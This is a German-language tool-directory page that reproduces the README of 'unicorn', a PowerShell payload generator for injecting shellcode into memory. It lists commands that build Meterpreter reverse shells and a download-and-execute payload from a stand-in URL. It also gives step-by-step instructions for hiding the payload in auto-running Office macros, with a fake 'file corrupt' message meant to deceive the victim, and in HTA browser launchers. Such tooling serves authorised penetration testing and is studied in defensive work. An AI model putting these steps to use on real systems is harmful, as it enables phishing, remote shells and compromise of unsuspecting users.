Skip to content
KitploitKITPLOIT
ToolsBlog
Log in
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

FeedsKontaktDatenschutz© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
unicorn — Unicorn ist ein einfaches Werkzeug, um einen PowerShell-Downgrade-Angriff durchzuführen und Shellcode direkt in den Speicher zu injizieren. Basierend auf Matthew Graebers PowerShell-Angriffen und der PowerShell-Bypass-Technik, die von David Kennedy (TrustedSec) und Josh Kelly auf der Defcon 18 vorgestellt wurde. | Kitploit
Tools/GitHubGitHub/trustedsec/unicorn
Phishing-ToolsExploit-FrameworksPayload-GenerierungIDS/IPS-UmgehungShellcodeWebanwendungs-ExploitationPenetrationstestsCommand and ControlSocial EngineeringShellcode-GenerierungPayload-Entwicklung
3.9k82337vor 9 TagenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →

Über

Unicorn ist ein einfaches Werkzeug, um einen PowerShell-Downgrade-Angriff durchzuführen und Shellcode direkt in den Speicher zu injizieren. Basierend auf Matthew Graebers PowerShell-Angriffen und der PowerShell-Bypass-Technik, die von David Kennedy (TrustedSec) und Josh Kelly auf der Defcon 18 vorgestellt wurde.

Top in IDS/IPS-Umgehung Nr.6
Top in Payload-Entwicklung Nr.5
Top in Payload-Generierung Nr.5
Top in Shellcode Nr.5
Top in Shellcode-Generierung Nr.5
GitHubtrustedsec/unicorn

unicorn

Repository anzeigenWebseite
Teilen

unicorn

Geschrieben von: Dave Kennedy (@HackingDave) Website: https://www.trustedsec.com

Magic Unicorn ist ein einfaches Werkzeug, um einen PowerShell-Downgrade-Angriff durchzuführen und Shellcode direkt in den Speicher zu injizieren. Basiert auf Matthew Graebers PowerShell-Angriffen und der PowerShell-Bypass-Technik, die von David Kennedy (TrustedSec) und Josh Kelly auf der Defcon 18 vorgestellt wurde.

Die Verwendung ist einfach: Führen Sie einfach Magic Unicorn aus (stellen Sie sicher, dass Metasploit installiert ist, wenn Sie Metasploit-Methoden verwenden, und dass es sich im richtigen Pfad befindet) und Magic Unicorn generiert automatisch einen PowerShell-Befehl, den Sie einfach ausschneiden und in ein Befehlszeilenfenster oder über ein Payload-Lieferungssystem einfügen müssen. Unicorn unterstützt eigenen Shellcode, Cobalt Strike und Metasploit.

root@rel1k:~/Desktop# python unicorn.py 

                                                         ,/
                                                        //
                                                      ,//
                                          ___   /|   |//
                                      `__/\_ --(/|___/-/
                                   \|\_-\___ __-_`- /-/ \.
                                  |\_-___,-\_____--/_)' ) \
                                   \ -_ /     __ \( `( __`\|
                                   `\__|      |\)\ ) /(/|
           ,._____.,            ',--//-|      \  |  '   /
          /     __. \,          / /,---|       \       /
         / /    _. \  \        `/`_/ _,'        |     |
        |  | ( (  \   |      ,/\'__/'/          |     |
        |  \  \`--, `_/_------______/           \(   )/
        | | \  \_. \,                            \___/\
        | |  \_   \  \                                 \
        \ \    \_ \   \   /                             \
         \ \  \._  \__ \_|       |                       \
          \ \___  \      \       |                        \
           \__ \__ \  \_ |       \                         |
           |  \_____ \  ____      |                        |
           | \  \__ ---' .__\     |        |               |
           \  \__ ---   /   )     |        \              /
            \   \____/ / ()(      \          `---_       /|
             \__________/(,--__    \_________.    |    ./ |
               |     \ \  `---_\--,           \   \_,./   |
               |      \  \_ ` \    /`---_______-\   \\    /
                \      \.___,`|   /              \   \\   \
                 \     |  \_ \|   \              (   |:    |
                  \    \      \    |             /  / |    ;
                   \    \      \    \          ( `_'   \  |
                    \.   \      \.   \          `__/   |  |
                      \   \       \.  \                |  |
                       \   \        \  \               (  )
                        \   |        \  |              |  |
                         |  \         \ \              I  `
                         ( __;        ( _;            ('-_';
                         |___\        \___:            \___:


aHR0cHM6Ly93d3cuYmluYXJ5ZGVmZW5zZS5jb20vd3AtY29udGVudC91cGxvYWRzLzIwMTcvMDUvS2VlcE1hdHRIYXBweS5qcGc=

                
-------------------- Magic Unicorn Angriffsvektor -----------------------------

Native x86 PowerShell-Injektionsangriffe auf jeder Windows-Plattform.
Geschrieben von: Dave Kennedy bei TrustedSec (https://www.trustedsec.com)
Twitter: @TrustedSec, @HackingDave
Credits: Matthew Graeber, Justin Elze, Chris Gates

Happy Magic Unicorns.

Usage: python unicorn.py payload reverse_ipaddr port <optional hta or macro, crt>
PS Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443
PS Down/Exec: python unicorn.py windows/download_exec url=http://badurl.com/payload.exe
Macro Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 macro
Macro Example CS: python unicorn.py <cobalt_strike_file.cs> cs macro
Macro Example Shellcode: python unicorn.py <path_to_shellcode.txt> shellcode macro
HTA Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 hta
HTA Example CS: python unicorn.py <cobalt_strike_file.cs> cs hta
HTA Example Shellcode: python unicorn.py <path_to_shellcode.txt>: shellcode hta
DDE Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 dde
CRT Example: python unicorn.py <path_to_payload/exe_encode> crt
Custom PS1 Example: python unicorn.py <path to ps1 file>
Custom PS1 Example: python unicorn.py <path to ps1 file> macro 500
Cobalt Strike Example: python unicorn.py <cobalt_strike_file.cs> cs (export CS in C# format)
Custom Shellcode: python unicorn.py <path_to_shellcode.txt> shellcode (formatted 0x00)
Help Menu: python unicorn.py --help

-----POWERSHELL-ANGRIFFSANLEITUNGEN----

Alles wird nun in zwei Dateien generiert: powershell_attack.txt und unicorn.rc. Die Textdatei enthält den gesamten Code, der benötigt wird, um den PowerShell-Angriff in den Speicher zu injizieren. Beachten Sie, dass Sie einen Ort benötigen, der eine Art Remote-Befehlsinjektion unterstützt. Oft kann dies über ein Excel/Word-Dokument oder über psexec_commands in Metasploit, SQLi usw. erfolgen. Es gibt unzählige Einsatzmöglichkeiten und Szenarien, in denen Sie diesen Angriff verwenden können. Fügen Sie einfach den Befehl aus powershell_attack.txt in ein beliebiges Eingabeaufforderungsfenster ein oder an einer Stelle, an der Sie die Möglichkeit haben, die PowerShell-ausführbare Datei aufzurufen, und Sie erhalten eine Shell zurück. Dieser Angriff unterstützt auch windows/download_exec als Payload-Methode, nicht nur Meterpreter-Payloads. Wenn Sie download_and_exec verwenden, geben Sie einfach python unicorn.py windows/download_exec url=https://www.thisisnotarealsite.com/payload.exe ein, und der PowerShell-Code lädt die Payload herunter und führt sie aus.

Beachten Sie, dass Sie einen Listener aktiviert haben müssen, um den Angriff zu erfassen.

-----MAKRO-ANGRIFFSANLEITUNGEN----

Für den Makro-Angriff müssen Sie zu Datei, Eigenschaften, Menübänder gehen und Entwicklertools auswählen. Sobald Sie das getan haben, haben Sie eine Registerkarte "Entwicklertools". Erstellen Sie ein neues Makro, nennen Sie es Auto_Open und fügen Sie den generierten Code dort ein. Dies wird automatisch ausgeführt. Beachten Sie, dass eine Meldung erscheint, die dem Benutzer mitteilt, dass die Datei beschädigt ist, und das Excel-Dokument automatisch schließt. DAS IST NORMALES VERHALTEN! Dies täuscht das Opfer, indem es glauben lässt, das Excel-Dokument sei beschädigt. Danach sollten Sie eine Shell durch PowerShell-Injektion erhalten.

Wenn Sie dies gegen Office365/2016+ Versionen von Word einsetzen, müssen Sie die erste Zeile der Ausgabe von: Sub Auto_Open()

Zu: Sub AutoOpen()

Ändern. Der Name des Makros selbst muss ebenfalls "AutoOpen" lauten, anstelle des alten Schemas "Auto_Open".

HINWEIS: BEIM KOPIEREN UND EINFÜGEN IN EXCEL MÜSSEN SIE, FALLS ZUSÄTZLICHE LEERZEICHEN HINZUGEFÜGT WERDEN, DIESE NACH JEDEM POWERSHELL-CODE-ABSCHNITT UNTER DER VARIABLEN "x" ENTFERNEN, SONST TRITT EIN SYNTAXFEHLER AUF!

-----HTA-ANGRIFFSANLEITUNGEN----

Der HTA-Angriff generiert automatisch zwei Dateien: zuerst die index.html, die dem Browser mitteilt, Launcher.hta zu verwenden, welches den bösartigen PowerShell-Injektionscode enthält. Alle Dateien werden in den Ordner hta_access/ exportiert, und es gibt drei Hauptdateien. Die erste ist index.html, die zweite Launcher.hta und die letzte die unicorn.rc-Datei. Sie können msfconsole -r unicorn.rc ausführen, um den Listener für Metasploit zu starten.

Ein Benutzer muss auf "Zulassen" klicken und die Aktion bestätigen, wenn der HTA-Angriff verwendet wird, damit die PowerShell-Injektion ordnungsgemäß funktioniert.

-----CERTUTIL-ANGRIFFSANLEITUNG----

Tool herunterladen